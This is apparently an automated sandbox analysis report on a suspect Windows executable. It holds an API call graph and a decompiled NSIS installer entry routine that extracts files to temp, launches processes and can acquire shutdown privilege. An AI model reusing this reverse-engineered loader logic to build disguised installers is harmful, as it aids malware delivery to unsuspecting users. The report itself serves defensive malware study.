4718->4720 4719 402ab0 RegCloseKey 4719->4724 4722 402a9b 4720->4722 4721 402a28 3 API calls 4721->4723 4722->4724 4725 402acb RegDeleteKeyA 4722->4725 4723->4717 4723->4718 4723->4719 4723->4721 4724->4715 4725->4724 4726 401d1b GetDC GetDeviceCaps 4727 4029cb 18 API calls 4726->4727 4728 401d37 MulDiv 4727->4728 4729 4029cb 18 API calls 4728->4729 4730 401d4c 4729->4730 4731 405aa7 18 API calls 4730->4731 4732 401d85 CreateFontIndirectA 4731->4732 4733 4024aa 4732->4733 4734 401e1b 4735 4029e8 18 API calls 4734->4735 4736 401e21 4735->4736 4737 404e23 25 API calls 4736->4737 4738 401e2b 4737->4738 4739 4052e5 2 API calls 4738->4739 4740 401e31 4739->4740 4741 401e87 CloseHandle 4740->4741 4742 40264e 4740->4742 4743 401e50 WaitForSingleObject 4740->4743 4745 405ddc 2 API calls 4740->4745 4741->4742 4743->4740 4744 401e5e GetExitCodeProcess 4743->4744 4746 401e70 4744->4746 4747 401e79 4744->4747 4745->4743 4749 4059e3 wsprintfA 4746->4749 4747->4741 4749->4747 3431 401721 3432 4029e8 18 API calls 3431->3432 3433 401728 3432->3433 3437 40578b 3433->3437 3435 40172f 3436 40578b 2 API calls 3435->3436 3436->3435 3438 405796 GetTickCount GetTempFileNameA 3437->3438 3439 4057c2 3438->3439 3440 4057c6 3438->3440 3439->3438 3439->3440 3440->3435 4750 4023a1 4751 402af2 19 API calls 4750->4751 4752 4023ab 4751->4752 4753 4029e8 18 API calls 4752->4753 4754 4023b4 4753->4754 4755 4023be RegQueryValueExA 4754->4755 4759 40264e 4754->4759 4756 4023de 4755->4756 4757 4023e4 RegCloseKey 4755->4757 4756->4757 4761 4059e3 wsprintfA 4756->4761 4757->4759 4761->4757 4762 401922 4763 4029e8 18 API calls 4762->4763 4764 401929 lstrlenA 4763->4764 4765 4024aa 4764->4765 3580 403225 #17 SetErrorMode OleInitialize 3650 405da3 GetModuleHandleA 3580->3650 3584 403293 GetCommandLineA 3655 405a85 lstrcpynA 3584->3655 3586 4032a5 GetModuleHandleA 3587 4032bc 3586->3587 3588 4055a3 CharNextA 3587->3588 3589 4032d0 CharNextA 3588->3589 3595 4032dd 3589->3595 3590 403346 3591 403359 GetTempPathA 3590->3591 3656 4031f1 3591->3656 3593 40336f 3596 403393 DeleteFileA 3593->3596 3597 403373 GetWindowsDirectoryA lstrcatA 3593->3597 3594 4055a3 CharNextA 3594->3595 3595->3590 3595->3594 3600 403348 3595->3600 3664 402c5b GetTickCount GetModuleFileNameA 3596->3664 3598 4031f1 11 API calls 3597->3598 3602 40338f 3598->3602 3749 405a85 lstrcpynA 3600->3749 3601 4033a4 3603 40340d 3601->3603 3605 4033fd 3601->3605 3608 4055a3 CharNextA 3601->3608 3602->3596 3602->3603 3766 4035a6 3603->3766 3694 4035e3 3605->3694 3610 4033bb 3608->3610 3619 4033d8 3610->3619 3620 40343c lstrcatA lstrcmpiA 3610->3620 3611 403426 3614 405346 MessageBoxIndirectA 3611->3614 3612 40350b 3613 40358e ExitProcess 3612->3613 3615 405da3 3 API calls 3612->3615 3617 403434 ExitProcess 3614->3617 3618 40351a 3615->3618 3621 405da3 3 API calls 3618->3621 3750 405659 3619->3750 3620->3603 3623 403458 CreateDirectoryA SetCurrentDirectoryA 3620->3623 3624 403523 3621->3624 3626 40347a 3623->3626 3627 40346f 3623->3627 3628 405da3 3 API calls 3624->3628 3774 405a85 lstrcpynA 3626->3774 3773 405a85 lstrcpynA 3627->3773 3631 40352c 3628->3631 3633 40357a ExitWindowsEx 3631->3633 3640 40353a GetCurrentProcess 3631->3640 3633->3613 3636 403587 3633->3636 3634 4033f2 3765 405a85 lstrcpynA 3634->3765 3635 405aa7 18 API calls 3638 4034aa DeleteFileA 3635->3638 3804 40140b 3636->3804 3641 4034b7 CopyFileA 3638->3641 3647 403488 3638->3647 3642 40354a 3640->3642 3641->3647 3642->3633 3643 4034ff 3645 4057d3 38 API calls 3643->3645 3645->3603 3646 405aa7 18 API calls 3646->3647 3647->3635 3647->3643 3647->3646 3649 4034eb CloseHandle 3647->3649 3775 4057d3 3647->3775 3801 4052e5 CreateProcessA 3647->3801 3649->3647 3651 405dca GetProcAddress 3650->3651 3652 405dbf LoadLibraryA 3650->3652 3653 403268 SHGetFileInfoA 3651->3653 3652->3651 3652->3653 3654 405a85 lstrcpynA 3653->3654 3654->3584 3655->3586 3657 405ce3 5 API calls 3656->3657 3658 4031fd 3657->3658 3659 403207 3658->3659 3660 405578 3 API calls 3658->3660 3659->3593 3661 40320f CreateDirectoryA 3660->3661 3662 40578b 2 API calls 3661->3662 3663 403223 3662->3663 3663->3593 3807 40575c GetFileAttributesA CreateFileA 3664->3807 3666 402c9e 3693 402cab 3666->3693 3808 405a85 lstrcpynA 3666->3808 3668 402cc1 3809 4055bf lstrlenA 3668->3809 3672 402cd2 GetFileSize 3673 402dd3 3672->3673 3691 402ce9 3672->3691 3674 402bc5 32 API calls 3673->3674 3675 402dda 3674->3675 3677 402e16 GlobalAlloc 3675->3677 3675->3693 3814 4031da SetFilePointer 3675->3814 3676 4031a8 ReadFile 3676->3691 3680 402e2d 3677->3680 3678 402e6e 3681 402bc5 32 API calls 3678->3681 3685 40578b 2 API calls 3680->3685 3681->3693 3682 402df7 3683 4031a8 ReadFile 3682->3683 3686 402e02 3683->3686 3684 402bc5 32 API calls 3684->3691 3687 402e3e CreateFileA 3685->3687 3686->3677 3686->3693 3688 402e78 3687->3688 3687->3693 3815 4031da SetFilePointer 3688->3815 3690 402e86 3692 402f01 47 API calls 3690->3692 3691->3673 3691->3676 3691->3678 3691->3684 3691->3693 3692->3693 3693->3601 3695 405da3 3 API calls 3694->3695 3696 4035f7 3695->3696 3697 4035fd 3696->3697 3698 40360f 3696->3698 3825 4059e3 wsprintfA 3697->3825 3699 40596c 3 API calls 3698->3699 3700 403630 3699->3700 3702 40364e lstrcatA 3700->3702 3704 40596c 3 API calls 3700->3704 3703 40360d 3702->3703 3816 403897 3703->3816 3704->3702 3707 405659 18 API calls 3708 403676 3707->3708 3709 4036ff 3708->3709 3711 40596c 3 API calls 3708->3711 3710 405659 18 API calls 3709->3710 3712 403705 3710->3712 3713 4036a2 3711->3713 3714 403715 LoadImageA 3712->3714 3715 405aa7 18 API calls 3712->3715 3713->3709 3718 4036be lstrlenA 3713->3718 3722 4055a3 CharNextA 3713->3722 3716 403740 RegisterClassA 3714->3716 3717 4037c9 3714->3717 3715->3714 3719 40377c SystemParametersInfoA CreateWindowExA 3716->3719 3720 4037d3 3716->3720 3721 40140b 2 API calls 3717->3721 3723 4036f2 3718->3723 3724 4036cc lstrcmpiA 3718->3724 3719->3717 3720->3603 3725 4037cf 3721->3725 3727 4036bc 3722->3727 3726 405578 3 API calls 3723->3726 3724->3723 3728 4036dc GetFileAttributesA 3724->3728 3725->3720 3729 403897 19 API calls 3725->3729 3730 4036f8 3726->3730 3727->3718 3731 4036e8 3728->3731 3732 4037e0 3729->3732 3826 405a85 lstrcpynA 3730->3826 3731->3723 3734 4055bf 2 API calls 3731->3734 3735 403864 3732->3735 3736 4037e8 ShowWindow LoadLibraryA 3732->3736 3734->3723 3827 404ef5 OleInitialize 3735->3827 3737 403807 LoadLibraryA 3736->3737 3738 40380e GetClassInfoA 3736->3738 3737->3738 3740 403822 GetClassInfoA RegisterClassA 3738->3740 3741 403838 DialogBoxParamA 3738->3741 3740->3741 3743 40140b 2 API calls 3741->3743 3742 40386a 3744 403886 3742->3744 3745 40386e 3742->3745 3747 403860 3743->3747 3746 40140b 2 API calls 3744->3746 3745->3720 3748 40140b 2 API calls 3745->3748 3746->3720 3747->3720 3748->3720 3749->3591 3842 405a85 lstrcpynA 3750->3842 3752 40566a 3753 40560c 4 API calls 3752->3753 3754 405670 3753->3754 3755 4033e3 3754->3755 3756 405ce3 5 API calls 3754->3756 3755->3603 3764 405a85 lstrcpynA 3755->3764 3761 405680 3756->3761 3757 4056ab lstrlenA 3758 4056b6 3757->3758 3757->3761 3759 405578 3 API calls 3758->3759 3762 4056bb GetFileAttributesA 3759->3762 3760 405d7c 2 API calls 3760->3761 3761->3755 3761->3757 3761->3760 3763 4055bf 2 API calls 3761->3763 3762->3755 3763->3757 3764->3634 3765->3605 3767 4035c1 3766->3767 3768 4035b7 CloseHandle 3766->3768 3769 4035d5 3767->3769 3770 4035cb CloseHandle 3767->3770 3768->3767 3843 4053aa 3769->3843 3770->3769 3773->3626 3774->3647 3776 405da3 3 API calls 3775->3776 3777 4057de 3776->3777 3778 40583b GetShortPathNameA 3777->3778 3781 405930 3777->3781 3886 40575c GetFileAttributesA CreateFileA 3777->3886 3780 405850 3778->3780 3778->3781 3780->3781 3783 405858 wsprintfA 3780->3783 3781->3647 3782 40581f CloseHandle GetShortPathNameA 3782->3781 3784 405833 3782->3784 3785 405aa7 18 API calls 3783->3785 3784->3778 3784->3781 3786 405880 3785->3786 3887 40575c GetFileAttributesA CreateFileA 3786->3887 3788 40588d 3788->3781 3789 40589c GetFileSize GlobalAlloc 3788->3789 3790 405929 CloseHandle 3789->3790 3791 4058ba ReadFile 3789->3791 3790->3781 3791->3790 3792 4058ce 3791->3792 3792->3790 3888 4056d1 lstrlenA 3792->3888 3795 4058e3 3893 405a85 lstrcpynA 3795->3893 3796 40593d 3798 4056d1 4 API calls 3796->3798 3799 4058f1 3798->3799 3800 405904 SetFilePointer WriteFile GlobalFree 3799->3800 3800->3790 3802 405320 3801->3802 3803 405314 CloseHandle 3801->3803 3802->3647 3803->3802 3805 401389 2 API calls 3804->3805 3806 401420 3805->3806 3806->3613 3807->3666 3808->3668 3810 4055cc 3809->3810 3811 4055d1 CharPrevA 3810->3811 3812 402cc7 3810->3812 3811->3810 3811->3812 3813 405a85 lstrcpynA 3812->3813 3813->3672 3814->3682 3815->3690 3817 4038ab 3816->3817 3834 4059e3 wsprintfA 3817->3834 3819 40391c 3820 405aa7 18 API calls 3819->3820 3821 403928 SetWindowTextA 3820->3821 3822 40365e 3821->3822 3823 403944 3821->3823 3822->3707 3823->3822 3824 405aa7 18 API calls 3823->3824 3824->3823 3825->3703 3826->3709 3835 403e83 3827->3835 3829 404f18 3833 404f3f 3829->3833 3838 401389 3829->3838 3830 403e83 SendMessageA 3831 404f51 OleUninitialize 3830->3831 3831->3742 3833->3830 3834->3819 3836 403e9b 3835->3836 3837 403e8c SendMessageA 3835->3837 3836->3829 3837->3836 3840 401390 3838->3840 3839 4013fe 3839->3829 3840->3839 3841 4013cb MulDiv SendMessageA 3840->3841 3841->3840 3842->3752 3844 405659 18 API calls 3843->3844 3845 4053be 3844->3845 3846 4053c7 DeleteFileA 3845->3846 3847 4053de 3845->3847 3848 403416 OleUninitialize 3846->3848 3849 40551d 3847->3849 3884 405a85 lstrcpynA 3847->3884 3848->3611 3848->3612 3849->3848 3854 405d7c 2 API calls 3849->3854 3851 405408 3852 405419 3851->3852 3853 40540c lstrcatA 3851->3853 3856 4055bf 2 API calls 3852->3856 3855 40541f 3853->3855 3857 405538 3854->3857 3858 40542d lstrcatA 3855->3858 3859 405438 lstrlenA FindFirstFileA 3855->3859 3856->3855 3857->3848 3861 405578 3 API calls 3857->3861 3858->3859 3860 405513 3859->3860 3880 40545c 3859->3880 3860->3849 3863 405542 3861->3863 3862 4055a3 CharNextA 3862->3880 3864 40573d 2 API calls 3863->3864 3865 405548 RemoveDirectoryA 3864->3865 3866 405553 3865->3866 3867 40556a 3865->3867 3866->3848 3871 405559 3866->3871 3868 404e23 25 API calls 3867->3868 3868->3848 3869 4054f2 FindNextFileA 3872 40550a FindClose 3869->3872 3869->3880 3873 404e23 25 API calls 3871->3873 3872->3860 3874 405561 3873->3874 3875 4057d3 38 API calls 3874->3875 3877 405568 3875->3877 3876 40573d 2 API calls 3878 4054bf DeleteFileA 3876->3878 3877->3848 3878->3880 3879 4053aa 59 API calls 3879->3880 3880->3862 3880->3869 3880->3876 3880->3879 3881 404e23 25 API calls 3880->3881 3882 404e23 25 API calls 3880->3882 3883 4057d3 38 API calls 3880->3883 3885 405a85 lstrcpynA 3880->3885 3881->3869 3882->3880 3883->3880 3884->3851 3885->3880 3886->3782 3887->3788 3889 405707 lstrlenA 3888->3889 3890 4056e5 lstrcmpiA 3889->3890 3892 405711 3889->3892 3891 4056fe CharNextA 3890->3891 3890->3892 3891->3889 3892->3795 3892->3796 3893->3799 4766 401ca5 4767 4029cb 18 API calls 4766->4767 4768 401cb5 SetWindowLongA 4767->4768 4769 40287d 4768->4769 4770 401a26 4771 4029cb 18 API calls 4770->4771 4772 401a2c 4771->4772 4773 4029cb 18 API calls 4772->4773 4774 4019d6 4773->4774 4775 4045aa 4776 4045d6 4775->4776 4777 4045ba 4775->4777 4779 404609 4776->4779 4780 4045dc SHGetPathFromIDListA 4776->4780 4786 40532a GetDlgItemTextA 4777->4786 4782 4045f3 SendMessageA 4780->4782 4783 4045ec 4780->4783 4781 4045c7 SendMessageA 4781->4776 4782->4779 4785 40140b 2 API calls 4783->4785 4785->4782 4786->4781 4787 402b2d 4788 402b55 4787->4788 4789 402b3c SetTimer 4787->4789 4790 402ba3 4788->4790 4791 402ba9 MulDiv 4788->4791 4789->4788 4792 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4791->4792 4792->4790 4794 401bad 4795 4029cb 18 API calls 4794->4795 4796 401bb4 4795->4796 4797 4029cb 18 API calls 4796->4797 4798 401bbe 4797->4798 4799 401bce 4798->4799 4800 4029e8 18 API calls 4798->4800 4801 4029e8 18 API calls 4799->4801 4805 401bde 4799->4805 4800->4799 4801->4805 4802 401be9 4806 4029cb 18 API calls 4802->4806 4803 401c2d 4804 4029e8 18 API calls 4803->4804 4807 401c32 4804->4807 4805->4802 4805->4803 4808 401bee 4806->4808 4809 4029e8 18 API calls 4807->4809 4810 4029cb 18 API calls 4808->4810 4812 401c3b FindWindowExA 4809->4812 4811 401bf7 4810->4811 4813 401c1d SendMessageA 4811->4813 4814 401bff SendMessageTimeoutA 4811->4814 4815 401c59 4812->4815 4813->4815 4814->4815 4816 40422e 4817 404264 4816->4817 4818 40423e 4816->4818 4820 403e9e 8 API calls 4817->4820 4819 403e37 19 API calls 4818->4819 4822 40424b SetDlgItemTextA 4819->4822 4821 404270 4820->4821 4822->4817 4823 402630 4824 4029e8 18 API calls 4823->4824 4825 402637 FindFirstFileA 4824->4825 4826 40265a 4825->4826 4830 40264a 4825->4830 4827 402661 4826->4827 4831 4059e3 wsprintfA 4826->4831 4832 405a85 lstrcpynA 4827->4832 4831->4827 4832->4830 4840 4024b0 4841 4024b5 4840->4841 4842 4024c6 4840->4842 4843 4029cb 18 API calls 4841->4843 4844 4029e8 18 API calls 4842->4844 4846 4024bc 4843->4846 4845 4024cd lstrlenA 4844->4845 4845->4846 4847 4024ec WriteFile 4846->4847 4848 40264e 4846->4848 4847->4848 3441 4015b3 3442 4029e8 18 API calls 3441->3442 3443 4015ba 3442->3443 3459 40560c CharNextA CharNextA 3443->3459 3445 4015c2 3446 40160a 3445->3446 3447 4055a3 CharNextA 3445->3447 3448 40162d 3446->3448 3449 40160f 3446->3449 3451 4015d0 CreateDirectoryA 3447->3451 3453 401423 25 API calls 3448->3453 3450 401423 25 API calls 3449->3450 3452 401616 3450->3452 3451->3445 3454 4015e5 GetLastError 3451->3454 3465 405a85 lstrcpynA 3452->3465 3458 40215b 3453->3458 3454->3445 3456 4015f2 GetFileAttributesA 3454->3456 3456->3445 3457 401621 SetCurrentDirectoryA 3457->3458 3460 405626 3459->3460 3464 405632 3459->3464 3461 40562d CharNextA 3460->3461 3460->3464 3462 40564f 3461->3462 3462->3445 3463 4055a3 CharNextA 3463->3464 3464->3462 3464->3463 3465->3457 3466 401734 3467 4029e8 18 API calls 3466->3467 3468 40173b 3467->3468 3469 401761 3468->3469 3470 401759 3468->3470 3521 405a85 lstrcpynA 3469->3521 3520 405a85 lstrcpynA 3470->3520 3473 40175f 3476 405ce3 5 API calls 3473->3476 3474 40176c 3522 405578 lstrlenA CharPrevA 3474->3522 3489 40177e 3476->3489 3481 401795 CompareFileTime 3481->3489 3482 401859 3483 404e23 25 API calls 3482->3483 3484 401863 3483->3484 3505 402f01 3484->3505 3485 404e23 25 API calls 3487 401845 3485->3487 3489->3481 3489->3482 3491 405aa7 18 API calls 3489->3491 3494 405a85 lstrcpynA 3489->3494 3502 401830 3489->3502 3504 40575c GetFileAttributesA CreateFileA 3489->3504 3525 405d7c FindFirstFileA 3489->3525 3528 40573d GetFileAttributesA 3489->3528 3531 405346 3489->3531 3490 40188a SetFileTime 3492 40189c FindCloseChangeNotification 3490->3492 3491->3489 3492->3487 3493 4018ad 3492->3493 3495 4018b2 3493->3495 3496 4018c5 3493->3496 3494->3489 3497 405aa7 18 API calls 3495->3497 3498 405aa7 18 API calls 3496->3498 3501 4018ba lstrcatA 3497->3501 3499 4018cd 3498->3499 3503 405346 MessageBoxIndirectA 3499->3503 3501->3499 3502->3485 3502->3487 3503->3487 3504->3489 3506 402f12 SetFilePointer 3505->3506 3507 402f2e 3505->3507 3506->3507 3535 40302c GetTickCount 3507->3535 3510 402f3f ReadFile 3511 402f5f 3510->3511 3516 401876 3510->3516 3512 40302c 42 API calls 3511->3512 3511->3516 3513 402f76 3512->3513 3514 402ff1 ReadFile 3513->3514 3513->3516 3518 402f86 3513->3518 3514->3516 3516->3490 3516->3492 3517 402fa1 ReadFile 3517->3516 3517->3518 3518->3516 3518->3517 3519 402fba WriteFile 3518->3519 3519->3516 3519->3518 3520->3473 3521->3474 3523 405592 lstrcatA 3522->3523 3524 401772 lstrcatA 3522->3524 3523->3524 3524->3473 3526 405d92 FindClose 3525->3526 3527 405d9d 3525->3527 3526->3527 3527->3489 3529 405759 3528->3529 3530 40574c SetFileAttributesA 3528->3530 3529->3489 3530->3529 3532 40535b 3531->3532 3533 4053a7 3532->3533 3534 40536f MessageBoxIndirectA 3532->3534 3533->3489 3534->3533 3536 403196 3535->3536 3537 40305b 3535->3537 3539 402bc5 32 API calls 3536->3539 3548 4031da SetFilePointer 3537->3548 3545 402f37 3539->3545 3540 403066 SetFilePointer 3544 40308b 3540->3544 3544->3545 3546 403120 WriteFile 3544->3546 3547 403177 SetFilePointer 3544->3547 3549 4031a8 ReadFile 3544->3549 3551 405e9d 3544->3551 3558 402bc5 3544->3558 3545->3510 3545->3516 3546->3544 3546->3545 3547->3536 3548->3540 3550 4031c9 3549->3550 3550->3544 3552 405ec2 3551->3552 3555 405eca 3551->3555 3552->3544 3553 405f51 GlobalFree 3554 405f5a GlobalAlloc 3553->3554 3554->3552 3554->3555 3555->3552 3555->3553 3555->3554 3556 405fd1 GlobalAlloc 3555->3556 3557 405fc8 GlobalFree 3555->3557 3556->3552 3556->3555 3557->3556 3559 402bd3 3558->3559 3560 402beb 3558->3560 3563 402be3 3559->3563 3564 402bdc DestroyWindow 3559->3564 3561 402bf3 3560->3561 3562 402bfb GetTickCount 3560->3562 3573 405ddc 3561->3573 3562->3563 3566 402c09 3562->3566 3563->3544 3564->3563 3567 402c3e CreateDialogParamA 3566->3567 3568 402c11 3566->3568 3567->3563 3568->3563 3577 402ba9 3568->3577 3570 402c1f wsprintfA 3571 404e23 25 API calls 3570->3571 3572 402c3c 3571->3572 3572->3563 3574 405df9 PeekMessageA 3573->3574 3575 405e09 3574->3575 3576 405def DispatchMessageA 3574->3576 3575->3563 3576->3574 3578 402bb8 3577->3578 3579 402bba MulDiv 3577->3579 3578->3579 3579->3570 4849 401634 4850 4029e8 18 API calls 4849->4850 4851 40163a 4850->4851 4852 405d7c 2 API calls 4851->4852 4853 401640 4852->4853 4854 401934 4855 4029cb 18 API calls 4854->4855 4856 40193b 4855->4856 4857 4029cb 18 API calls 4856->4857 4858 401945 4857->4858 4859 4029e8 18 API calls 4858->4859 4860 40194e 4859->4860 4861 401961 lstrlenA 4860->4861 4862 40199c 4860->4862 4863 40196b 4861->4863 4863->4862 4867 405a85 lstrcpynA 4863->4867 4865 401985 4865->4862 4866 401992 lstrlenA 4865->4866 4866->4862 4867->4865 4868 4019b5 4869 4029e8 18 API calls 4868->4869 4870 4019bc 4869->4870 4871 4029e8 18 API calls 4870->4871 4872 4019c5 4871->4872 4873 4019cc lstrcmpiA 4872->4873 4874 4019de lstrcmpA 4872->4874 4875 4019d2 4873->4875 4874->4875 4876 4014b7 4877 4014bd 4876->4877 4878 401389 2 API calls 4877->4878 4879 4014c5 4878->4879 4880 4025be 4881 4025c5 4880->4881 4887 40282a 4880->4887 4882 4029cb 18 API calls 4881->4882 4883 4025d0 4882->4883 4884 4025d7 SetFilePointer 4883->4884 4885 4025e7 4884->4885 4884->4887 4888 4059e3 wsprintfA 4885->4888 4888->4887 4889 40673f 4892 405ed0 4889->4892 4890 405f51 GlobalFree 4891 405f5a GlobalAlloc 4890->4891 4891->4892 4895 40683b 4891->4895 4892->4890 4892->4891 4892->4892 4893 405fd1 GlobalAlloc 4892->4893 4894 405fc8 GlobalFree 4892->4894 4892->4895 4893->4892 4893->4895 4894->4893

                                                                                            Executed Functions

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 403225-4032ba #17 SetErrorMode OleInitialize call 405da3 SHGetFileInfoA call 405a85 GetCommandLineA call 405a85 GetModuleHandleA 7 4032c6-4032db call 4055a3 CharNextA 0->7 8 4032bc-4032c1 0->8 11 403340-403344 7->11 8->7 12 403346 11->12 13 4032dd-4032e0 11->13 16 403359-403371 GetTempPathA call 4031f1 12->16 14 4032e2-4032e6 13->14 15 4032e8-4032f0 13->15 14->14 14->15 17 4032f2-4032f3 15->17 18 4032f8-4032fb 15->18 26 403393-4033aa DeleteFileA call 402c5b 16->26 27 403373-403391 GetWindowsDirectoryA lstrcatA call 4031f1 16->27 17->18 20 403330-40333d call 4055a3 18->20 21 4032fd-403301 18->21 20->11 36 40333f 20->36 24 403311-403317 21->24 25 403303-40330c 21->25 31 403327-40332e 24->31 32 403319-403322 24->32 25->24 29 40330e 25->29 39 403411-403420 call 4035a6 OleUninitialize 26->39 40 4033ac-4033b2 26->40 27->26 27->39 29->24 31->20 34 403348-403354 call 405a85 31->34 32->31 38 403324 32->38 34->16 36->11 38->31 50 403426-403436 call 405346 ExitProcess 39->50 51 40350b-403511 39->51 42 403401-403408 call 4035e3 40->42 43 4033b4-4033bd call 4055a3 40->43 48 40340d 42->48 54 4033c8-4033ca 43->54 48->39 52 403513-403530 call 405da3 * 3 51->52 53 40358e-403596 51->53 81 403532-403534 52->81 82 40357a-403585 ExitWindowsEx 52->82 57 403598 53->57 58 40359c-4035a0 ExitProcess 53->58 59 4033cc-4033d6 54->59 60 4033bf-4033c5 54->60 57->58 64 4033d8-4033e5 call 405659 59->64 65 40343c-403456 lstrcatA lstrcmpiA 59->65 60->59 63 4033c7 60->63 63->54 64->39 74 4033e7-4033fd call 405a85 * 2 64->74 65->39 68 403458-40346d CreateDirectoryA SetCurrentDirectoryA 65->68 71 40347a-403494 call 405a85 68->71 72 40346f-403475 call 405a85 68->72 80 403499-4034b5 call 405aa7 DeleteFileA 71->80 72->71 74->42 92 4034f6-4034fd 80->92 93 4034b7-4034c7 CopyFileA 80->93 81->82 86 403536-403538 81->86 82->53 85 403587-403589 call 40140b 82->85 85->53 86->82 91 40353a-40354c GetCurrentProcess 86->91 91->82 98 40354e-403570 91->98 92->80 96 4034ff-403506 call 4057d3 92->96 93->92 94 4034c9-4034e9 call 4057d3 call 405aa7 call 4052e5 93->94 94->92 107 4034eb-4034f2 CloseHandle 94->107 96->39 98->82 107->92
                                                                                            C-Code - Quality: 82%
                                                                                            			_entry_() {
                                                                                            				struct _SHFILEINFOA _v360;
                                                                                            				struct _SECURITY_ATTRIBUTES* _v376;
                                                                                            				char _v380;
                                                                                            				CHAR* _v384;
                                                                                            				char _v396;
                                                                                            				int _v400;
                                                                                            				int _v404;
                                                                                            				CHAR* _v408;
                                                                                            				intOrPtr _v412;
                                                                                            				int _v416;
                                                                                            				intOrPtr _v420;
                                                                                            				struct _SECURITY_ATTRIBUTES* _v424;
                                                                                            				void* _v432;
                                                                                            				int _t34;
                                                                                            				CHAR* _t39;
                                                                                            				char* _t42;
                                                                                            				signed int _t44;
                                                                                            				void* _t48;
                                                                                            				intOrPtr _t50;
                                                                                            				signed int _t52;
                                                                                            				signed int _t55;
                                                                                            				int _t56;
                                                                                            				signed int _t60;
                                                                                            				void* _t79;
                                                                                            				void* _t89;
                                                                                            				void* _t91;
                                                                                            				char* _t96;
                                                                                            				signed int _t97;
                                                                                            				void* _t98;
                                                                                            				signed int _t99;
                                                                                            				signed int _t100;
                                                                                            				signed int _t103;
                                                                                            				CHAR* _t105;
                                                                                            				signed int _t106;
                                                                                            				char _t120;
                                                                                            
                                                                                            				_v376 = 0;
                                                                                            				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                            				_t99 = 0;
                                                                                            				_v380 = 0x20;
                                                                                            				__imp__#17();
                                                                                            				_t34 = SetErrorMode(0x8001); // executed
                                                                                            				__imp__OleInitialize(0); // executed
                                                                                            				 *0x423f58 = _t34;
                                                                                            				 *0x423ea4 = E00405DA3(8);
                                                                                            				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
                                                                                            				E00405A85(0x4236a0, "NSIS Error");
                                                                                            				_t39 = GetCommandLineA();
                                                                                            				_t96 = "\"C:\\Users\\jones\\Desktop\\O53TFikPkp.exe\" ";
                                                                                            				E00405A85(_t96, _t39);
                                                                                            				 *0x423ea0 = GetModuleHandleA(0);
                                                                                            				_t42 = _t96;
                                                                                            				if("\"C:\\Users\\jones\\Desktop\\O53TFikPkp.exe\" " == 0x22) {
                                                                                            					_v404 = 0x22;
                                                                                            					_t42 =  &M00429001;
                                                                                            				}
                                                                                            				_t44 = CharNextA(E004055A3(_t42, _v404));
                                                                                            				_v404 = _t44;
                                                                                            				while(1) {
                                                                                            					_t91 =  *_t44;
                                                                                            					_t109 = _t91;
                                                                                            					if(_t91 == 0) {
                                                                                            						break;
                                                                                            					}
                                                                                            					__eflags = _t91 - 0x20;
                                                                                            					if(_t91 != 0x20) {
                                                                                            						L5:
                                                                                            						__eflags =  *_t44 - 0x22;
                                                                                            						_v404 = 0x20;
                                                                                            						if( *_t44 == 0x22) {
                                                                                            							_t44 = _t44 + 1;
                                                                                            							__eflags = _t44;
                                                                                            							_v404 = 0x22;
                                                                                            						}
                                                                                            						__eflags =  *_t44 - 0x2f;
                                                                                            						if( *_t44 != 0x2f) {
                                                                                            							L15:
                                                                                            							_t44 = E004055A3(_t44, _v404);
                                                                                            							__eflags =  *_t44 - 0x22;
                                                                                            							if(__eflags == 0) {
                                                                                            								_t44 = _t44 + 1;
                                                                                            								__eflags = _t44;
                                                                                            							}
                                                                                            							continue;
                                                                                            						} else {
                                                                                            							_t44 = _t44 + 1;
                                                                                            							__eflags =  *_t44 - 0x53;
                                                                                            							if( *_t44 == 0x53) {
                                                                                            								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                                                                                            								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                                                                                            									_t99 = _t99 | 0x00000002;
                                                                                            									__eflags = _t99;
                                                                                            								}
                                                                                            							}
                                                                                            							__eflags =  *_t44 - 0x4352434e;
                                                                                            							if( *_t44 == 0x4352434e) {
                                                                                            								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                                                                                            								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                                                                                            									_t99 = _t99 | 0x00000004;
                                                                                            									__eflags = _t99;
                                                                                            								}
                                                                                            							}
                                                                                            							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                                                                                            							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                                                                                            								 *((intOrPtr*)(_t44 - 2)) = 0;
                                                                                            								__eflags = _t44 + 2;
                                                                                            								E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t44 + 2);
                                                                                            								L20:
                                                                                            								_t105 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                                            								GetTempPathA(0x400, _t105);
                                                                                            								_t48 = E004031F1(_t109);
                                                                                            								_t110 = _t48;
                                                                                            								if(_t48 != 0) {
                                                                                            									L22:
                                                                                            									DeleteFileA("1033"); // executed
                                                                                            									_t50 = E00402C5B(_t111, _t99); // executed
                                                                                            									_v412 = _t50;
                                                                                            									if(_t50 != 0) {
                                                                                            										L32:
                                                                                            										E004035A6();
                                                                                            										__imp__OleUninitialize();
                                                                                            										if(_v408 == 0) {
                                                                                            											__eflags =  *0x423f34;
                                                                                            											if( *0x423f34 != 0) {
                                                                                            												_t106 = E00405DA3(3);
                                                                                            												_t100 = E00405DA3(4);
                                                                                            												_t55 = E00405DA3(5);
                                                                                            												__eflags = _t106;
                                                                                            												_t97 = _t55;
                                                                                            												if(_t106 != 0) {
                                                                                            													__eflags = _t100;
                                                                                            													if(_t100 != 0) {
                                                                                            														__eflags = _t97;
                                                                                            														if(_t97 != 0) {
                                                                                            															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                                                                                            															__eflags = _t60;
                                                                                            															if(_t60 != 0) {
                                                                                            																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                                                                                            																_v416 = 1;
                                                                                            																_v404 = 2;
                                                                                            																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                                                                                            															}
                                                                                            														}
                                                                                            													}
                                                                                            												}
                                                                                            												_t56 = ExitWindowsEx(2, 0);
                                                                                            												__eflags = _t56;
                                                                                            												if(_t56 == 0) {
                                                                                            													E0040140B(9);
                                                                                            												}
                                                                                            											}
                                                                                            											_t52 =  *0x423f4c;
